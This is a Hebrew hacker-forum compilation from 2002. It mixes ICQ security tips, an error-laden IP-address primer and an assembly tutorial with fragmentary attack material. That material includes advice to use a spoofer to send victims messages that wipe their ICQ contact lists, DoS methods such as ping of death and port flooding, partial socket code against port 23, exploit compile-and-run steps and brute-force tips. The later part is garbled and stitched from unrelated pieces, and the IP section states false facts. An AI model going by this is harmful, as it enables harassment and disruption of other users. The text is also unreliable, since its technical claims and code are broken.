‫לאתר אני יסבר לכם מה קרה!‬
‫רק תמיד תשתמשו בפרוקסי לא משנה איפה לא משנה למה אפילו אם אתם שולחים‬
‫דואר בטלנט או עושים ברוט פורס לאתר הם יום אחד יתפסו אותכם!!!‬
‫אז תזהרו!!!!‬
‫חומר למחשבה‪ ,‬קול אבדול‬
‫לאבטח את האיי סי קיו‬

‫לאבטח את האיי סי קיו‬
‫=================================‬
‫הגיע הזמן שיהיו כמה טקסטים על אבטחה ולא רק על פריצה בכל אופן כאן אני‬
‫יסביר‬
‫איך לאבטח את האיי קיו שלכם כמה שיותר‪.‬‬
‫כבר שנים שאוכלוסיית האיי סי קיו הולגת ומתעצמת ואנשים כבר לא יכולים‬
‫לזכור את המספר שלהם כי כבר יש בו ‪ 12‬ספרות אז הם מוצאים מישהו‬
‫עלוב שיש לו מספר קצר פורצים לו לאיי סי קיו והוא יכול לבכות‪ .‬וכולנו‬
‫יודעים שאנחנו לא רוצים להגיע למצב כזה אז‪...‬‬
‫סיסמאות‪:‬‬
‫‪+++++++++++++‬‬
‫בסיסי‬
‫_______‬
‫דבר ראשון‪:‬‬
‫שהסיסמה שלכם לא תהיה שם העיר שלכם אין לכם מושג כמה אנשים עושים את זה‬
‫דבר שני‪:‬‬
‫שהסיסמה לא תהיה משהו שאתם אוהבים‬
‫דבר שלישי‪:‬‬
‫השתמשו תמיד גם באותיות וגם בספרות‬
‫דבר רביעי‪:‬‬
‫השתמשו גם באותיות קטנות וגם באותיות גדולות‬
‫מתקדם‬
‫________‬
‫דבר ראשון‪:‬‬
‫דבר ראשון השתמשו באותיות אסקי מוסתרות אני ממליץ לדוגמא על‬
‫‪Alt+255‬‬
‫שזה כאילו לא עושה כלום אבל בעצם הוא עושה אות בלתי נראית‬
‫דבר שני‪:‬‬
‫השתמשו יותר משורה אחת בסיסמא)אני יודע מה אתם חושבים אבל כן זה אפשרי(‬
‫פשוט תורידו את‬
‫‪KaosICQCrack 1.2‬‬
‫מהאתר‬
‫‪http://www.nzkaos.net‬‬
‫איי פי‬
‫‪+++++++++++++‬‬
‫הערה‪ :‬זה לא עובד באיי סי קיו ‪2001‬‬
‫שימו לב לכו לכפתור שכתוב עליו‬

‫‪Icq‬‬
‫בתוכו כנסו ל‬
‫‪Security & Privacy‬‬
‫מצאו את האפשרות‬
‫‪connections‬‬
‫וסמנו את‬
‫‪Allow DC with‬‬
‫‪.user apon authorization‬‬
‫עכשיו האיי פי שלכם מוסתר‬
‫באיי סי קיו ‪ 2001‬לכו ל‬

‫‪preferences‬‬
‫ותעשו הכל משם!‬
‫קראקים‬
‫‪++++++++++++++++++++‬‬
‫וואו כמה קראקים קיימים אני יתן כמה דוגמאות והסברים‬
‫אחד‪ :‬לראות מספר איי פי של משתמש גם אם הוא עשת את ההסתרה כמו שכתוב‬
‫קודם‬
‫שתיים‪ :‬להוסיף משתמש לאיי סי קיו בלי‬
‫‪authorization‬‬
‫שלוש‪:‬השתמשות ביותר מאיי סי קיו אחד באותו זמן‬
‫ארבע‪ :‬הוספת עצמך לרשימה שלך זה יכול להיות מאוד שימושי‬
‫‪-spoofing‬לרמות‬
‫‪++++++++++++++++++++++++++++++‬‬
‫מה שספופר עושה זה לרמות לשנות במספר האיי פי שלך הוא יוצר איי פי חדש‬
‫אפילו ספופרים טובים יכולים לזייף מספר איי סי קיו‬
‫אתם יכולים להוריד ספופר ב‬
‫‪www.warforge.com‬‬
‫הוא נקרא‬
‫‪lame toy‬‬
‫אני חושב שאחד הדברים הכי טובים לעשות עם ספופר הוא לשלוח לאנשים הודעות‬
‫מעצמם ולהגיד שזה המחשב שלהם‬
‫מה שגם נגרם אחרי זה הוא ש כשבן אדם מוסיף את עצמו לרשימה שלו קורה משהו‬
‫שנקרא‬
‫‪db corruption‬‬
‫זאת אומרת שכל הרשימה שלו נמחקת!‬
‫מבנה כתובת האיי פי‬

‫מדריך למבנה מספרי האיי פי‬

‫טוב זה מדריך מאוד בסיסי‬
‫)מומלץ לקרוא על מספרים בינריים(‬
‫בכל אופן כל מספר איי פי‬
‫)‪(ip‬‬
‫בנוי על בסיס‬
‫‪ascii‬‬
‫שאת אומרת שלעולם לא תראו מספר כזה‬
‫‪xxx.xxx.xxx.312‬‬
‫או כל מספר אחר אשר יותר גדול מ ‪255‬‬
‫כל שלושה ספרות באיי פי = ‪ 8‬ביט = ‪ 1‬בייט‬
‫שימו לב‪:‬‬
‫ביט לא שווה לבייט‬
‫‪bit is not equal to byte‬‬
‫‪bits = 1 byte 8‬‬
‫למה זה מספרי איי פי מורכבים מ ‪ 3‬ספרות אחרי כל נקודה‬
‫הרי בין ‪ 3‬לשמונה אין קשר ברור מאליו‬
‫טוב אז פה ה"סוד" מספרי האיי פי בנויים על בסיס‬
‫‪decimal‬‬
‫)‪(decimal=ascii‬‬
‫)‪(decimal=-256 to 255‬‬
‫ובסיס טבעי של מחשבים הוא כמובן הבסיס הבינארי‬
‫)‪(binary=2‬‬
‫זאת אומרת שהכל מסמנים על ידי אפס ואחד טוב אז אם תשימו לב בקוד בינארי‬
‫יש ‪ 8‬ספרות‬
‫‪(binary)=101100(binary)=44(decimal || ascii)00101100‬‬
‫בכל אופן סך הכול ישנם ‪ 8‬ספרות אשר מסמלים ‪ 8‬ביטים זאת אומרת שמספרי אי‬
‫פי לא מקבלים שום‬
‫הצפנה ובעצם זה חישוב באופן דצימלי‬
‫עכשיו‬
‫‪xxx.xxx.xxx.xxx‬‬
‫^‬ ‫^‬ ‫^‬ ‫^‬
‫|‬ ‫|‬ ‫|‬ ‫|‬
‫_____‬ ‫_____‬
‫~‬ ‫~ ~‬ ‫~‬
‫^‬ ‫^‬
‫|‬ ‫|‬
‫‪network | host‬‬
‫האמת שזה לא יכול לעזור לכם בשום אופן שאני יכול להעלות על דעתי אבל‬
‫תהנו עם זה‬
‫)לא שאת זה אפשר לעשות(‬
‫בהצלחה‬
‫נושא‪ :‬תכנות‬
‫כאן יוצגו טקסטים ומדריכים ללימוד שפות תכנות‪ ,‬טיפים ועוד‬
‫מדריך אסמבלי חלק ‪'1‬‬
‫שפת התכנות אסמבלי ‪Black Snake -‬‬
‫===============================‬
‫מדריך ‪ :1‬יחידות אחסנה‪ ,‬בסיסי ספירה‪ ,‬הזיכרון והאוגרים‪.‬‬
‫‪-----------------------------------------------------‬‬
‫יחידות אחסנה‬
‫‪-=-=-=-=-=-=-‬‬
‫הנתונים והפקודות מוחזקים במחשב ביחידות אחסנה שונות‪:‬‬
‫סיבית ‪ - Bit -‬יחידת המידע הקטנה ביותר במחשב‪ ,‬מייצגת‬
‫ספרה בינארית שערכה ‪ 1‬או ‪.0‬‬
‫בית ‪ - Byte -‬צירוף של ‪ 8‬סיביות‪ ,‬למשל ‪.00001010‬‬
‫סה"כ יש ‪ 256‬אפשרויות )כולל ה‪ ,(0-‬והייצוג המקובל של‬

‫צירופי‬
‫הסיביות נקרא קוד אסקי ‪.ASCII code‬‬
‫לרוב הצירופים יש ייצוג גרפי שניתן לתצוגה במדפסת ולהדפסה‪.‬‬
‫מילה ‪ - Word -‬צירוף של ‪ 16‬סיביות‪ ,‬או ‪ 2‬בתים‪.‬‬
‫מילה כפולה ‪ - Dword -‬צירוף של ‪ 32‬סיביות‪ ,‬או ‪ 4‬בתים‪.‬‬
‫בסיסי ספירה‬
‫‪-=-=-=-=-=-‬‬
‫מתוך כל האפשרויות הרבות שקיימות‪ ,‬אסביר פה על שלושה בסיסי ספירה‪:‬‬
‫בסיס דצימלי )עשרוני(‪ :‬היחיד שמשמש אותנו בחיי היום‪-‬יום‪.‬‬
‫ברם‪ ,‬מכיוון שהוא אינו מוכר למחשב כלל )המכיר‬

‫בערכי ‪ 1‬ו‪ 0-‬בלבד(‪.‬‬
‫בסיס בינארי )בסיס ‪ :(2‬כולל ‪ 2‬ספרות בלבד‪ 0 ,‬ו‪.1-‬‬
‫בסיס הקסדצימלי )בסיס ‪ :(16‬משתמשים ב‪ 10-‬הספרות ובאותיות ‪:A-F‬‬
‫‪A,B,C,D,E,F,0,1,2,3,4,5,6,7,8,9‬‬
‫השימוש בבסיס הקסדצימלי נוח‪ ,‬מכיון שהוא מתאר בצורה ברורה יותר נתונים‬
‫הכתובים בבסיס בינארי ‪ -‬כל ‪ 4‬ספרות בינאריות מיוצגות בו ע"י ספרה‬

‫הקסדצימלית אחת‪.‬‬
‫ייצוג מספרים‬
‫‪------------‬‬
‫כאשר תכתבו ערך מספרי בשפת אסמבלי‪ ,‬תסמנו לידו את הבסיס שבו הוא מיוצג‪.‬‬
‫עושים זאת ע"י כתיבה של אחת מהאותיות הבאות מימין למספר‪ ,‬אפשר לכתוב אות‬
‫קטנה או גדולה‪:‬‬
‫‪ - B‬מספר בינארי‪ ,‬לדוגמא‪ 11110010 :‬ואחר כך מוסיפים ‪ B‬מצד ימין‪.‬‬
‫‪ - H‬מספר הקסדצימלי‪ ,‬לדוגמא‪ 45 :‬ואחר כך מוסיפים ‪ H‬מצד ימין‪.‬‬
‫‪ - D‬או בלי ציון בכלל ‪ -‬מספר דצימלי‪ ,‬לדוגמא‪ 29 :‬ואחר כך מוספים ‪ D‬מצד‬
‫ימין‪ ,‬או ‪ 29‬בלבד‪.‬‬
‫הזיכרון‬
‫‪-=-=-=-‬‬
‫הזיכרון הוא ההתקן של מערכת המחשב שבו נשמרים פקודות התוכנית שמתבצעת‬
‫במחשב‬
‫והנתונים השוטפים המשמשים אותה כקלט‪ ,‬או מופקים ומיועדים לאחד מאמצעי‬
‫הפלט‪.‬‬
‫הזיכרון משמש לאחסון תוכניות‪.‬‬
‫כל תוכנית חייבת להיות בזיכרון כדי שהמעבד יבצע אותה‪.‬‬

‫המעבד מקבל את כתובת הזיכרון וכך הוא מאתר את התחלת התוכנית וכך הוא‬
‫מבצע את הפקודות זו אחר זו עד לסיום התוכנית‪.‬‬
‫הזיכרון בנוי מ‪ -‬תאים‪ ,‬כל תא יכול להכיל בית אחד בלבד)‪ 8‬סיביות(‪.‬‬
‫לכל אחד מהתאים יש כתובת‪ :‬התא הראשון הוא בכתובת ‪ ,0‬ולאחריו הכתובת היא‬
‫‪ 1‬וכך הלאה‪.‬‬
‫תיאור הזיכרון‬
‫‪-------------‬‬
‫‪| 0| 6‬‬
‫‪|24| 5‬‬
‫‪|43| 4‬‬
‫‪| 0| 3‬‬
‫‪| 0| 2‬‬
‫‪| 0| 1‬‬
‫‪| 0| 0‬‬
‫בדוגמא שלפניכם‪ ,‬התא שבכתובת ‪ 4‬מכיל את הערך ‪.43‬‬
‫התא שבכתובת ‪ 5‬מכיל את הערך ‪.24‬‬
‫שאר התאים מכילים את הערך ‪.0‬‬
‫כדי שנוכל לעבד את הנתונים‪ ,‬צריך להיות מנגנון לקריאה וכתיבה שלהם בתאי‬
‫הזיכרון‪.‬‬
‫קריאת הנתון או קליטת נתון אינה הורסת ואינה משנה את ערכו בתא‪.‬‬
‫בכל קריאת נתון מהזיכרון‪ ,‬יש להגדיר את הכתובת שממנה יש לקרוא אותו‪.‬‬
‫אפשר לכתוב נתון חדש לתא‪ ,‬אבל במקרה הזה ‪ -‬הערך החדש ימחוק ויחליף את‬
‫הערך הישן שהיה בתא‪.‬‬
‫בשביל לכתוב נתון חדש לתא‪ ,‬צריכים לציין את הכתובת שאליה כותבים את‬
‫הנתון החדש ואת הנתון לכתיבה‪.‬‬
‫למשל‪:‬‬
‫אם נכתוב את הנתון ‪ 54‬בכתובת ‪ 5‬נקבל את הדבר הבא‪:‬‬
‫‪| 0| 6‬‬
‫‪|54| 5‬‬
‫‪|43| 4‬‬
‫‪| 0| 3‬‬
‫‪| 0| 2‬‬
‫‪| 0| 1‬‬
‫‪| 0| 0‬‬
‫הנתונים נמצאים בזיכרון של המחשב כל עוד המחשב פועל‪.‬‬
‫כאשר נכבה המחשב‪ ,‬כל הנתונים נאבדים‪.‬‬
‫הצורך לבצע גיבוי היא פעולה של כתיבת הנתונים מהזיכרון על מדיה מגנטית‪,‬‬
‫דיסק או דיסקט‪,‬‬
‫כדי שיישמרו ולא יאבדו גם לאחר כיבוי המחשב‪.‬‬
‫אוגרים‬
‫‪-=-=-=-‬‬
‫למי שלא קלט‪ ,‬זו לא הכוונה למכרסמים הקטנים אלא לאוגרים שבמעבד‪.‬‬
‫קיימים במעבד ‪ 14‬אוגרים )‪ ,(registers‬אשר כל אחד מהם בגודל של מילה אחת‬

‫)‪ 16‬סיביות(‪.‬‬
‫כמו בזיכרון ‪ -‬כך גם האוגר מכיל נתון‪ ,‬אשר אפשר לקרוא אותו או להחליף‬
‫אותו באחר‪.‬‬
‫כמו בזיכרון‪ ,‬כיבוי המחשב גורם לאובדן הנתונים שהיו באוגר‪.‬‬
‫האוגרים משמשים לשמירת נתונים‪ ,‬לביצוע פעולות חשבוניות ופעולות לוגיות‪,‬‬

‫להעברת נתונים‬
‫אל הזיכרון וממנו‪ ,‬ועוד‪.‬‬
‫לכל אוגר יש תפקיד‪ ,‬אך בכמה אוגרים משתמשים למטרות דומות‪.‬‬
‫ניתן לחלק את האוגרים ל‪ 4-‬קבוצות ע"פ התפקיד שלהם‪.‬‬
‫אוגרים כלליים )‪(General Purpose registers‬‬
‫‪----------------------------------------‬‬
‫‪High‬‬ ‫‪Low‬‬
‫‪----------------------------------‬‬
‫| ‪Accumulator‬‬ ‫‪AH‬‬ ‫| |‬ ‫‪AL‬‬ ‫|‬ ‫‪AX‬‬
‫‪----------------------------------‬‬
‫‪Base‬‬ ‫|‬ ‫‪BH‬‬ ‫| |‬ ‫‪BL‬‬ ‫|‬ ‫‪BX‬‬
‫‪----------------------------------‬‬
‫‪count‬‬ ‫|‬ ‫‪CH‬‬ ‫| |‬ ‫‪CL‬‬ ‫|‬ ‫‪CX‬‬
‫‪----------------------------------‬‬
‫‪Data‬‬ ‫|‬ ‫‪DH‬‬ ‫| |‬ ‫‪DL‬‬ ‫|‬ ‫‪DX‬‬
‫‪----------------------------------‬‬
‫לרשותנו ‪ 4‬אוגרים כלליים‪.‬‬
‫אפשר להבחין שכל אחד מהאוגרים ניתן לחלוקה ל‪ 2-‬חצאי אוגר‪.‬‬
‫לכל מחצית אוגר יש סימון של אות זיהוי של האוגר ולידה האות ‪ H‬או ‪.L‬‬
‫החלק השמאלי מסומן באות ‪ ,H‬כדי לציין ‪ - High‬החלק הגבוה של המספר‪.‬‬
‫החלק הימני מסומן באות ‪ ,L‬כדי לציין ‪ - Low‬החלק הנמוך של המספר‪.‬‬

‫אוגר ‪:1‬‬
‫אוגר ‪ - AX‬אוגר זה מכונה גם צובר או אקומולטור )משתמשים בו לסיכום‬

‫מספרים(‪.‬‬
‫החלק השמאלי נקרא ‪ AH‬והחלק הימני נקרא ‪.AL‬‬
‫אוגר ‪:2‬‬
‫אוגר ‪) BX‬אוגר הבסיס( ‪ -‬החלק השמאלי נקרא ‪ BH‬והחלק הימני נקרא ‪.BL‬‬
‫אוגר ‪:3‬‬
‫אוגר ‪) CX‬אוגר המונה( ‪ -‬החלק השמאלי נקרא ‪ CH‬והחלק הימני נקרא ‪.CL‬‬
‫אוגר ‪:4‬‬
‫אוגר ‪) DX‬אוגר הנתונים( ‪ -‬החלק השמאלי נקרא ‪ DH‬והחלק הימני נקרא ‪.DL‬‬
‫ע"י חלוקה זו קיבלנו ‪ 12‬אוגרים שונים‪ :‬ניתן לפנות לאוגר ‪ AX‬השלם‪ ,‬או לכל‬
‫אחד משני חצאיו‪.‬‬
‫אוגרי המקטע )‪(Segment registers‬‬
‫‪-------------------------------‬‬
‫‪CS‬‬ ‫‪Code Segment‬‬
‫‪DS‬‬ ‫‪Data Segment‬‬
‫‪ES‬‬ ‫‪Extra Segment‬‬
‫‪SS‬‬ ‫‪Stack Segment‬‬

‫אוגר ‪:5‬‬
‫אוגר ‪) CS‬אוגר מקטע הקוד( ‪ -‬מכיל את כתובת ההתחלה של התוכנית‪.‬‬
‫אוגר ‪:6‬‬
‫אוגר ‪) DS‬אוגר מקטע הנתונים( ‪ -‬מכיל את כתובת ההתחלה של מקטע הנתונים‪.‬‬
‫אוגר ‪:7‬‬
‫אוגר ‪) ES‬אוגר הנתונים נוספים( ‪ -‬מכיל את כתובת תחילת הנתונים הנוספים‬

‫)אם יש(‪.‬‬
‫אוגר ‪:8‬‬
‫אוגר ‪) SS‬אוגר המחסנית( ‪ -‬מכיל את כתובת תחילת המחסנית )יוסבר במדריכים‬

‫הבאים(‪.‬‬
‫אוגרים מצביעים )‪(Pointer registers‬‬
‫‪----------------------------------‬‬
‫‪SI‬‬ ‫‪Source Index‬‬
‫‪DI‬‬ ‫‪Destination Index‬‬
‫אוגר ‪:9‬‬
‫אוגר ‪) SI‬אוגר מצביע מקור( ‪ -‬מצביע על כתובת תא זיכרון מבוקש‪.‬‬
‫אוגר ‪:10‬‬
‫אוגר ‪) DI‬אוגר מצביע יעד( ‪ -‬מצביע על כתובת תא זיכרון מבוקש‪.‬‬

‫‪BP‬‬ ‫‪Base Pointer‬‬
‫‪SP‬‬ ‫‪Stack Pointer‬‬
‫אוגר ‪:11‬‬
‫אוגר ‪) BP‬מצביע הבסיס( ‪ -‬משמש כמצביע על כתובת תאי הזיכרון במחסנית‪.‬‬
‫אוגר ‪:12‬‬
‫אוגר ‪) SP‬מצביע המחסנית( ‪ -‬מצביע על כתובת תא הזיכרון בקצה המחסנית‪.‬‬
‫‪IP Instruction Pointer‬‬
‫אוגר ‪:13‬‬
‫אוגר ‪) IP‬מצביע פקודה( ‪ -‬זוהי הכתובת של ההוראה הבאה לביצוע‪.‬‬
‫אוגר הדגלים )‪(Flags register‬‬
‫‪----------------------------‬‬
‫‪F‬‬ ‫‪Flags register‬‬
‫אוגר ‪:14‬‬
‫אוגר ‪) F‬אוגר הדגלים( ‪ -‬מכיל ‪ 9‬דגלים )סיביות( הנמצאים במצב אחד או אפס‬
‫לוגי‪.‬‬
‫הם מתארים מאפיינים מסויימים בפעולה האחרונה‬

‫שבוצעה ע"י היחידה‬
‫אריתמטית‪-‬לוגית )‪ (ALU‬של המעבד‪.‬‬
‫כאן מוסברים בקצרה האוגרים ותפקידיהם‪.‬‬
‫מדריך אסמבלי חלק ‪'2‬‬
‫שפת התכנות אסמבלי ‪Black Snake -‬‬
‫===============================‬
‫מדריך ‪ :2‬פקודות בסיסיות‪ ,‬סדר פעולות וכללים‪.‬‬
‫‪-------------------------------------------‬‬
‫כיצד כותבים פקודות בשפת אסמבלי‬
‫‪-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-‬‬
‫לשפת אסמבלי יש עשרות פקודות‪.‬‬
‫שמות הפקודות מרמזות על מהותן‪ ,‬ולכן אפשר לזכור אותן בקלות‪.‬‬
‫בגלל ששפת אסמבלי ניתנת לזכירה‪ ,‬שפת אסמבלי‬
‫מכונה גם בשם ‪ Mnemonic Language‬שפירושו "מסייע לזיכרון"‪.‬‬
‫חלק גדול מהפקודות נרשמות בתבנית הבאה‪:‬‬
‫פקודה‬ ‫אופרנד‬ ‫‪,‬‬ ‫אופרנד‬ ‫דוגמאות‪:‬‬
‫‪------------------------‬‬
‫‪MOV‬‬ ‫‪AX‬‬ ‫‪,‬‬ ‫‪56‬‬

‫‪------------------------‬‬
‫‪ADD‬‬ ‫]‪[SI‬‬ ‫‪,‬‬ ‫‪DL‬‬
‫‪------------------------‬‬
‫‪CMP‬‬ ‫‪CX‬‬ ‫‪,‬‬ ‫‪BX‬‬
‫‪------------------------‬‬
‫את הפקודות תמיד קוראים משמאל לימין‪ ,‬נרשמת פקודה ולאחר מכן אופרנד אשר‬
‫יכול להיות‬
‫אוגר‪ ,‬כתובת זיכרון ועוד‪ ,‬לאחר מכן יש פסיק )‪ (,‬המשמש להפרדה בין‬
‫האופרנדים ואחריו‬
‫מופיע אופרנד נוסף‪.‬‬
‫תבנית זו פועלת ע"פ הכלל הבא‪:‬‬
‫האופרנד השמאלי‪ ,‬הקרוב לפקודה‪ ,‬הוא זה שעליו מבוצעת הפקודה‪.‬‬
‫הוא נקרא גם אופרנד היעד )‪.(destination operand‬‬
‫האופרנד הימני הוא אופרנד המקור )‪.(source operand‬‬
‫חלק מהפקודות כולל אופרנד אחד‪ ,‬המשמש כאופרנד היעד‪.‬‬
‫פקודות אחרות אינן כוללות אופרנדים כלל‪ ,‬מכיון שהאופרנדים עבור פקודות‬
‫אלו הם‬
‫קבועים ואינם ניתנים לשינוי‪.‬‬
‫מימין לפקודה ניתן להוסיף הערות )‪.(remarks‬‬
‫כדי לעשות זאת‪ ,‬יש לרשום את סימן הנקודה‪-‬פסיק );( ולאחריה הערה‪.‬‬
‫הנה דוגמא לפקודה הכוללת הערה‪:‬‬
‫‪MOV AL,32‬‬ ‫הצבת המספר ‪ 32‬באוגר ‪;AL‬‬
‫משמאל לפקודה ניתן להוסיף תווית)‪ ,(label‬המאפשרת לקפוץ ממקום כלשהו‬

‫בתוכנית למקום אחר ע"פ‬
‫התווית‪.‬‬
‫דוגמא לפקודה הכוללת תווית והערה‪:‬‬
‫‪HI: MOV BX,4567‬‬ ‫מציב ‪ 4567‬באוגר ‪) BX‬שם התווית ‪;(HI‬‬
‫הפקודה ‪MOV‬‬
‫‪-========-‬‬
‫הפקודה ‪ MOV‬גורמת להעתקה ולא להעברה של נתון ממקום אחד למקום אחר‬
‫בתוכנית‪.‬‬
‫לפקודה זו מספר אפשרויות‪:‬‬
‫‪ .1‬העתקת ערך ישירות לאוגר)הצבת נתון באוגר(‪.‬‬
‫‪ .2‬העתקת נתון מאוגר לאוגר‪.‬‬
‫‪ .3‬העתקת נתון מאוגר לתא זיכרון‪.‬‬
‫‪ .4‬העתקת נתון מתא זיכרון לאוגר‪.‬‬
‫‪ .1‬העתקה ישירה לאוגר‪.‬‬
‫‪---------------------‬‬
‫פעולה זו גם נקראת "הצבה באוגר"‪.‬‬
‫תבנית הפקודה‪:‬‬
‫צמוד לפקודה ‪ MOV‬נרשם שם של אחד האוגרים ומימינו‪ ,‬לאחר הפסיק‪ ,‬נרשם הערך‬
‫שאותו רוצים להציב‪.‬‬
‫דוגמא‪:‬‬
‫הצבת הערך ‪) 3545‬בבסיס הקסדצימלי( בתוך אוגר ‪:BX‬‬
‫‪MOV DX,3545H‬‬
‫תמונת האוגר‪:‬‬
‫_______________‬
‫|‬ ‫|‬ ‫|‬
‫‪DX‬‬ ‫|‬ ‫‪35‬‬ ‫|‬ ‫‪45‬‬ ‫|‬
‫|______|______|‬
‫‪DH‬‬ ‫‪DL‬‬
‫כל ספרה הקסדצימלית תופסת מקום של ‪ 4‬סיביות‪.‬‬
‫בכל אחד מחצאי האוגר מוצבות ‪ 2‬ספרות‪ ,‬המהוות יחד ‪ 8‬סיביות‪.‬‬
‫הספרות בעלות הערכים הגבוהים יותר‪ ,‬נשמרות תמיד בחצי האוגר השמאלי הגבוה‬
‫‪.H‬‬
‫‪ .2‬העתקת נתון מאוגר לאוגר‪.‬‬
‫‪--------------------------‬‬

ספר הידע הגדול של האקר-זון

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

ספר הידע הגדול של האקר-זון

Uploaded by

Copyright:

Available Formats

‫ספר הידע הגדול של האקר‪-‬זון‬

‫כאן ב"ספר" הזה אנחנו נאסוף את מיטב הטקסטים והמדריכים‬

‫שכתבנו נכון ל‪ -15/7/2002.‬אנחנו מקווים שתהנו והכי חשוב‬

‫שתלמדו! אנא בקרו אותנו באתרנו לטקסטים חדשים יותר‬

‫ונוספים‪ ,‬תוכנות האקינג רבות‪ ,‬עמוד לינוקס מפורט ומעודכן‬

‫הכולל אקספלוייטים ודרכי שימושם‪ ,‬פורום נהדר עם קהילה‬

‫נהדרת‪ ,‬ואף תוכלו לפרסם את הטקסטים שלכם ללא דאגה בלי‬

‫בעיה באופן אוטומטי!‬

‫כדי לקבל את כל הדברים הללו כל שעליכם לעשות הוא להכנס‬

‫לאתרנו בכתובת הבאה‪:‬‬

‫פריצה לאתרים‪ ,‬למחשבים‪ ,‬וכו' וכו'!‬

‫כמה שיטות לנתק אנשים מהאינטרנט‬

‫בלינוקס אתם עושים‪:‬‬

‫‪the lame ping o death (3‬‬

‫‪port flooding (4‬‬

‫ראשונה‪ :‬להתחבר לפורטים להמון פורטים ראנדומאלים ב ‪ tcp‬או ב‬

‫שנייה‪ :‬להתחבר המון פעמים לאותו פורט זה יגרום לפורטים‬

‫בעעע הרגע גיליתי שהתקייה של הפרל שלי ‪ ...‬נהרסה‬

‫טוב אני כבר לא משועמם כי אני זז מפה‬

‫אחרי שמצאתם תלחצו על הסימן של ה ‪ +‬בשלט )תוודאו שאתם מסמנים את זה(‬

‫‪time crack for all (4‬‬

‫יאללה אני חייב לזוז‬

‫‪Php, java ,VBS, Asp‬‬ ‫‪, cgi‬‬

‫או כל שפת אינטרנט חוץ מ ‪html -‬‬

‫כאן אני הולך להסביר קצת חרא על ‪DoS‬‬

/* define dport 23 /* The port we want#

} (int open_sock(int sock, char *server, int port

} (if ((he = gethostbyname(server)) != NULL

} (if (connect(sock,(struct sockaddr *)&blah,16)==-1

([]void main(int argc, char *argv

‫‪} (++for (i=0; i<10; i‬‬

‫הפורט שאתם צריכים זה כמובן ‪23‬‬

‫זהו ‪ ...‬מתחיל להמאס לי לכתוב ‪ ....‬האי סי קיו שלי הוא‬

‫אני פתחתי באתר השני חשבון‪.‬‬

‫הפיל זה השם של האקספלויט‬ ‫‪<chmod 732 <file‬‬

::::‫טוב איך אנחנו עומדים לעשות את זה‬

‫הפיל זה השם של האקספלויט‬

<type ./<filename> <host> <command

<gcc <filename.c> -o <filename .1

ֱ‫להערות והארות כנסו לערוץ שלי במיר‬

:‫עוד תיקון בקשר למה שטיסל אמר‬

A DDOS (Distributed Denial Of Service) is actually an attack on your

-Break a Site, The CWay

‫‪ ./‬אים תקבל הודעה שאומרת שהקובץ לא‬

ֱ‫להערות והארות כנסו לערוץ שלי במיר‬

!!!‫בפעם הבאה אני ילמד על‬

‫מה שהבאג אומר זה צא למצב פקודות‬

‫‪} ()function password‬‬

‫‪;("",':Ret=prompt('Please enter your password‬‬

‫‪(".alert("Incorrect Password... That's a Sad Attempt‬‬

‫ומפה אנחנו מסיקים שהסיסמא היא ‪.123456‬‬

‫כל הזכויות שמורות ל ‪ © InPHo‬אין להעתיק‪ ,‬לגנוב או להפיץ בלי רשות!‬

‫מבחן הארי מרפי חלק ב'‬

‫כל הזכויות שמורות ל ‪ © InPHo‬אין להעתיק‪ ,‬לגנוב או להפיץ בלי רשות!‬

‫מבחן הארי מרפי חלק ג'‬

‫אני חושב שאני יודע איך לעבור את שלב תשיעי של מרפי!!!‬

‫צריך לבנות קובץ טקסט עם כל הצירופים האפשריים )בערך שלוש מליון!(‬

‫ללכת למישהוא שיש לו איי‪.‬די‪.‬אס‪.‬אל ולהפעיל את‬

‫מה שהתוכנה עושה זה לבדוק אקספוייטים של יוניקוד‪ ...‬אז במקום יוניקוד‬

‫עכשיו! מה שהקוד עושה זה להוביל את המשתמש לדף בשם של הססמא‬

‫אם כתבת את הססמא‬

‫הוא יוביל אותך לדף‬

‫נריץ את בודק האקספלוייטים ובמקום לבדוק אם היוניקוד קיים נבדוק אם הדף‬

‫האפשרויות‪ -‬כמו בברוט פורס‬

(bool_t xdr_cm_send(XDR xdrs, struct cm_send objp

(bool_t xdr_cm_reply(XDR xdrs, struct cm_reply objp